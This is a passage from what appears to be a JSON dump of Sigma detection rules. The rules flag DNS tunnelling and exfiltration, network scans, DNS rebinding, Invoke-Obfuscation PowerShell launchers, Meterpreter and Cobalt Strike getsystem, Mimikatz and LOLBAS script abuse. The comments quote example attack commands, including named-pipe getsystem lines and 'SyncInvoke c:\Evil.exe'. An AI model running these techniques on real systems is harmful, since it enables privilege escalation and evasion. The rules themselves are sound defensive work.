    "content": "title: High NULL Records Requests Rate\nid: 44ae5117-9c44-40cf-9c7c-7edad385ca70\nstatus: unsupported\ndescription: Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'NULL'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 50\nfalsepositives:\n    - Legitimate high DNS NULL requests rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_requests_rate.yml",
    "content": "title: High DNS Requests Rate\nid: b4163085-4001-46a3-a79a-55d8bbbc7a3a\nstatus: unsupported\ndescription: High DNS requests amount from host per short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: '*'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 1000\nfalsepositives:\n    - Legitimate high DNS requests rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_high_subdomain_rate.yml",
    "content": "title: High DNS subdomain requests rate per domain\nid: 8198e9a8-e38f-4ba5-8f16-882b1c0f880e\ndescription: High rate of unique Fully Qualified Domain Names (FQDN) requests per root domain (eTLD+1) in short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2019/11/04\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: dns\ndetection:\n    dns_question_name:\n        query: \"*\"\n    default_list_of_well_known_domains:\n        query_etld_plus_one: \n            - \"akadns.net\"\n            - \"akamaiedge.net\"\n            - \"amazonaws.com\"\n            - \"apple.com\"\n            - \"apple-dns.net\"\n            - \"cloudfront.net\"\n            - \"icloud.com\"\n            - \"in-addr.arpa\"\n            - \"google.com\"\n            - \"yahoo.com\"\n            - \"dropbox.com\"\n            - \"windowsupdate.com\"\n            - \"microsoftonline.com\"\n            - \"s-microsoft.com\"\n            - \"office365.com\"\n            - \"linkedin.com\"\n    timeframe: 15m\n    condition: count(subdomain) per query_etld_plus_one per computer_name > 200 and not default_list_of_well_known_domains\n    #    for each host in timeframe\n    #                for each dns_question_etld_plus_one\n    #                    if number of dns_question_name > 200\n    #                        dns_question_etld_plus_one is not in default_list_of_well_known_domains\nfalsepositives:\n    - Legitimate domain name requested, which should be added to whitelist\nlevel: high\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/network/net_dns_high_txt_records_requests_rate.yml",
    "content": "title: High TXT Records Requests Rate\nid: f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35\nstatus: unsupported\ndescription: Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'TXT'\n    timeframe: 1m\n    condition: selection | count() by src_ip > 50\nfalsepositives:\n    - Legitimate high DNS TXT requests rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_dns_large_domain_name.yml",
    "content": "title: Large domain name request\nid: 14aa0d9e-c70a-4a49-bdc1-e5cbc4fc6af7\ndescription: Detects large DNS domain names\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2019/11/04\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query_length: \"> 70\"              # IS MORE THAN 70 bytes\n    default_list_of_well_known_domains:\n        query_etld_plus_one:\n            - \"akadns.net\"\n            - \"akamaiedge.net\"\n            - \"amazonaws.com\"\n            - \"apple.com\"\n            - \"apple-dns.net\"\n            - \"cloudfront.net\"\n            - \"icloud.com\"\n            - \"in-addr.arpa\"\n            - \"google.com\"\n            - \"yahoo.com\"\n            - \"dropbox.com\"\n            - \"windowsupdate.com\"\n            - \"microsoftonline.com\"\n            - \"s-microsoft.com\"\n            - \"office365.com\"\n            - \"linkedin.com\"\n    condition: selection and not default_list_of_well_known_domains\nfalsepositives:\n    - Legitimate domain name requested, which should be added to whitelist\nlevel: high\nstatus: unsupported"
  },
  {
    "path": "unsupported/network/net_firewall_high_dns_bytes_out.yml",
    "content": "title: High DNS Bytes Out - Firewall\nid: 3b6e327d-8649-4102-993f-d25786481589\nstatus: unsupported\ndescription: High DNS queries bytes amount from host per short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port: 53\n    timeframe: 1m\n    condition: selection | sum(message_size) by src_ip > 300000\nfalsepositives:\n    - Legitimate high DNS bytes out rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_high_dns_requests_rate.yml",
    "content": "title: High DNS Requests Rate - Firewall\nid: 51186749-7415-46be-90e5-6914865c825a\nstatus: unsupported\ndescription: High DNS requests amount from host per short period of time\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command_and_control\n    - attack.t1071.004\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        dst_port: 53\n    timeframe: 1m\n    condition: selection | count() by src_ip > 1000\nfalsepositives:\n    - Legitimate high DNS requests rate to domain name which should be added to whitelist\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_susp_network_scan_by_ip.yml",
    "content": "title: Network Scans Count By Destination IP\nid: 4601eaec-6b45-4052-ad32-2d96d26ce0d8\nstatus: unsupported\ndescription: Detects many failed connection attempts to different ports or hosts\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        action: denied\n    timeframe: 24h\n    condition: selection | count(dst_ip) by src_ip > 10\nfields:\n    - src_ip\n    - dst_ip\n    - dst_port\nfalsepositives:\n    - Inventarization systems\n    - Vulnerability scans\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_firewall_susp_network_scan_by_port.yml",
    "content": "title: Network Scans Count By Destination Port\nid: fab0ddf0-b8a9-4d70-91ce-a20547209afb\nstatus: unsupported\ndescription: Detects many failed connection attempts to different ports or hosts\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: firewall\ndetection:\n    selection:\n        action: denied\n    timeframe: 24h\n    condition: selection | count(dst_port) by src_ip > 10\nfields:\n    - src_ip\n    - dst_ip\n    - dst_port\nfalsepositives:\n    - Inventarization systems\n    - Vulnerability scans\nlevel: medium\n"
  },
  {
    "path": "unsupported/network/net_possible_dns_rebinding.yml",
    "content": "title: Possible DNS Rebinding\nid: ec5b8711-b550-4879-9660-568aaae2c3ea\nstatus: unsupported\ndescription: 'Detects DNS-answer with TTL <10.'\ndate: 2019/10/25\nauthor: Ilyas Ochkov, oscd.community\nreferences:\n    - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325\ntags:\n    - attack.command_and_control\n    - attack.t1043\nlogsource:\n    product: dns\ndetection:\n    selection:\n        answer: '*'\n    filter1:\n        ttl: '>0'\n    filter2:\n        ttl: '<10'\n    timeframe: 30s\n    condition: selection and filter1 and filter2 | count(answer) by src_ip > 3\nlevel: medium\n"
  },
  {
    "path": "unsupported/other/modsec_mulitple_blocks.yml",
    "content": "title: Multiple Modsecurity Blocks\nid: a06eea10-d932-4aa6-8ba9-186df72c8d23\nstatus: unsupported\ndescription: Detects multiple blocks by the mod_security module (Web Application Firewall)\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/02/28\nmodified: 2023/03/24\ntags:\n    - attack.impact\n    - attack.t1499\nlogsource:\n    product: modsecurity\ndetection:\n    selection:\n        - 'mod_security: Access denied'\n        - 'ModSecurity: Access denied'\n        - 'mod_security-message: Access denied'\n    timeframe: 120m\n    condition: selection | count() > 6\nfalsepositives:\n    - Vulnerability scanners\n    - Frequent attacks if system faces Internet\nlevel: medium\n"
  },
  {
    "path": "unsupported/web/web_multiple_susp_resp_codes_single_source.yml",
    "content": "title: Multiple Suspicious Resp Codes Caused by Single Client\nid: 6fdfc796-06b3-46e8-af08-58f3505318af\nstatus: unsupported\ndescription: Detects possible exploitation activity or bugs in a web application\nauthor: Thomas Patzke\ndate: 2017/02/19\nmodified: 2023/03/24\ntags:\n    - attack.initial_access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        sc-status:\n            - 400\n            - 401\n            - 403\n            - 500\n    timeframe: 10m\n    condition: selection | count() by clientip > 10\nfields:\n    - client_ip\n    - vhost\n    - url\n    - response\nfalsepositives:\n    - Unstable application\n    - Application that misuses the response codes\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/dns_query_win_possible_dns_rebinding.yml",
    "content": "title: Possible DNS Rebinding\nid: eb07e747-2552-44cd-af36-b659ae0958e4\nstatus: unsupported\ndescription: Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).\nreferences:\n    - https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019/10/25\nmodified: 2023/02/24\ntags:\n    - attack.initial_access\n    - attack.t1189\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    dns_answer:\n        QueryName: '*'\n        QueryStatus: '0'\n    filter_int_ip:\n        QueryResults|startswith:\n            - '(::ffff:)?10.'\n            - '(::ffff:)?192.168.'\n            - '(::ffff:)?172.16.'\n            - '(::ffff:)?172.17.'\n            - '(::ffff:)?172.18.'\n            - '(::ffff:)?172.19.'\n            - '(::ffff:)?172.20.'\n            - '(::ffff:)?172.21.'\n            - '(::ffff:)?172.22.'\n            - '(::ffff:)?172.23.'\n            - '(::ffff:)?172.24.'\n            - '(::ffff:)?172.25.'\n            - '(::ffff:)?172.26.'\n            - '(::ffff:)?172.27.'\n            - '(::ffff:)?172.28.'\n            - '(::ffff:)?172.29.'\n            - '(::ffff:)?172.30.'\n            - '(::ffff:)?172.31.'\n            - '(::ffff:)?127.'\n    timeframe: 30s\n    condition: (dns_answer and filter_int_ip) and (dns_answer and not filter_int_ip) | count(QueryName) by ComputerName > 3\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_clip+_services.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher\nid: 21e4b3c1-4985-4aa4-a6c0-f8639590a5f3\nrelated:\n    - id: f7385ee2-0e0c-11eb-adc1-0242ac120002\n      type: derived\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/13\nmodified: 2021/09/16\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 26)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\\\"\\{\\d\\}.+\\-f.+\\\"'\n    condition: selection \nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_obfuscated_iex_services.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation\nid: e75c48bd-3434-4d61-94b7-ddfaa2c08487\nrelated:\n    - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\n      type: derived\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nstatus: unsupported\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019/11/08\nmodified: 2022/07/07\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - ImagePath|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ImagePath|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ImagePath|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ImagePath|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ImagePath|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ImagePath|re: '\\$VerbosePreference\\.ToString\\('\n        - ImagePath|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_stdin+_services.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher\nid: de7fb680-6efa-4bf3-af2c-14b6d33c8e6e\nrelated:\n    - id: 72862bf2-0eb1-11eb-adc1-0242ac120002\n      type: derived\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/15\nmodified: 2021/09/17\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 25)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n    condition: selection \nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_var+_services.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher\nid: 3e27b010-2cf2-4577-8ef0-3ea44aaea0dc\nrelated:\n    - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75\n      type: derived\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nstatus: unsupported\nauthor: Jonathan Cheong, oscd.community\ndate: 2020/10/15\nmodified: 2021/09/17\nreferences:\n     - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 24)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '.*cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_compress_services.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION\nid: c70731dd-0097-40ff-b112-f7032f29c16c\nrelated:\n    - id: 175997c5-803c-4b08-8bb0-70b099f47595\n      type: derived  \ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2023/03/04\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 19)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all: \n            - 'new-object'\n            - 'text.encoding]::ascii'\n        ImagePath|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        ImagePath|endswith: 'readtoend'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_rundll_services.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER\nid: 03b024c6-aad1-4da5-9f60-e9e8c00fa64c\nrelated:\n    - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\n      type: derived\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/18\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_stdin_services.yml",
    "content": "title: Invoke-Obfuscation Via Stdin\nid: 82b66143-53ee-4369-ab02-de2c70cd6352\nrelated:\n    - id: 487c7524-f892-4054-b263-8a0ace63fc25\n      type: derived\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/12\nmodified: 2023/04/23\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task28)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_clip_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip\nid: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851\nrelated:\n    - id: 63e3365d-4824-42d8-8b82-e56810fefa0c\n      type: derived\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/04/26\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task29)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_mshta_services.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA\nid: a4e82ad2-7430-4ee8-b858-6ad6099773fa\nrelated:\n    - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\n      type: derived\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task31)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_rundll32_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32\nid: 4e1518d9-2136-4015-ab49-c31d7c8588e1\nrelated:\n    - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b\n      type: derived\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task30)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all: \n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ImagePath|contains:     \n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_var++_services.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION\nid: 7b9a650e-6788-4fdf-888d-ec7c0a62810d\nrelated:\n    - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\n      type: derived\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/13\nmodified: 2021/09/18\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task27)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation\nid: d585ab5a-6a69-49a8-96e8-4a726a54de46\nrelated:\n    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\n      type: derived\nstatus: unsupported\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth\ndate: 2019/10/26\nmodified: 2022/12/22\ntags:\n    - attack.privilege_escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - 'cmd'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - '%COMSPEC%'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - 'cmd.exe'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        - ImagePath|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    condition: selection\nfields:\n    - ComputerName\n    - SubjectDomainName\n    - SubjectUserName\n    - ImagePath\nfalsepositives:\n    - Highly unlikely\nlevel: critical"
  },
  {
    "path": "unsupported/windows/driver_load_tap_driver_installation.yml",
    "content": "title: Tap Driver Installation\nid: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb\nrelated:\n    - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\n      type: derived\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques\nstatus: unsupported\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019/10/24\nmodified: 2021/09/21\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP insntallation\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/file_event_executable_and_script_creation_by_office_using_file_ext.yml",
    "content": "title: File Creation by Office Applications\nid: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d\ndescription: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: \"Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\"\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nstatus: experimental\ndate: 2021/08/23\nmodified: 2022/06/02\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    #useful_information: Please add more file extensions and magic bytes to the logic of your choice.\n    selection1:\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\outlook.exe'\n    selection2:\n        FileName|endswith:\n            - \".exe\"\n            - \".dll\"\n            - \".ocx\"\n            - \".com\"\n            - \".ps1\"\n            - \".vbs\"\n            - \".sys\"\n            - \".bat\"\n            - \".scr\"\n            - \".proj\"\n    selection3:\n        FileMagicBytes|startswith:\n            - \"4D5A\"\n    condition: selection1 and (selection2 or selection3)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/image_load_mimikatz_inmemory_detection.yml",
    "content": "title: Mimikatz In-Memory\nid: c0478ead-5336-46c2-bd5e-b4c84bc3a36e\nstatus: unsupported\ndescription: Detects certain DLL loads when Mimikatz gets executed\nreferences:\n    - https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/\nauthor: sigma\ndate: 2017/03/13\nmodified: 2023/02/24\ntags:\n    - attack.s0002\n    - attack.t1003\n    - attack.lateral_movement\n    - attack.credential_access\n    - car.2019-04-004\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selector:\n        Image: 'C:\\Windows\\System32\\rundll32.exe'\n    dllload1:\n        ImageLoaded|endswith: '\\vaultcli.dll'\n    dllload2:\n        ImageLoaded|endswith: '\\wlanapi.dll'\n    exclusion:\n        ImageLoaded:\n            - 'ntdsapi.dll'\n            - 'netapi32.dll'\n            - 'imm32.dll'\n            - 'samlib.dll'\n            - 'combase.dll'\n            - 'srvcli.dll'\n            - 'shcore.dll'\n            - 'ntasn1.dll'\n            - 'cryptdll.dll'\n            - 'logoncli.dll'\n    timeframe: 30s\n    condition: selector | near dllload1 and dllload2 and not exclusion\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/posh_ps_cl_invocation_lolscript_count.yml",
    "content": "title: Execution via CL_Invocation.ps1 (2 Lines)\nid: f588e69b-0750-46bb-8f87-0e9320d57536\nstatus: unsupported\ndescription: Detects Execution via SyncInvoke in CL_Invocation.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/02/24\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'CL_Invocation.ps1'\n            - 'SyncInvoke'\n    condition: selection | count(ScriptBlockText) by Computer > 2\n    # PS > Import-Module c:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1\n    # PS > SyncInvoke c:\\Evil.exe\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/posh_ps_cl_mutexverifiers_lolscript_count.yml",
    "content": "title: Execution via CL_Mutexverifiers.ps1 (2 Lines)\nid: 6609c444-9670-4eab-9636-fe4755a851ce\nstatus: unsupported\ndescription: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\n    - https://twitter.com/pabraeken/status/995111125447577600\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/02/24\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'CL_Mutexverifiers.ps1'\n            - 'runAfterCancelProcess'\n    condition: selection | count(ScriptBlockText) by Computer > 2\n    # PS > Import-Module c:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1\n    # PS > runAfterCancelProcess c:\\Evil.exe\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
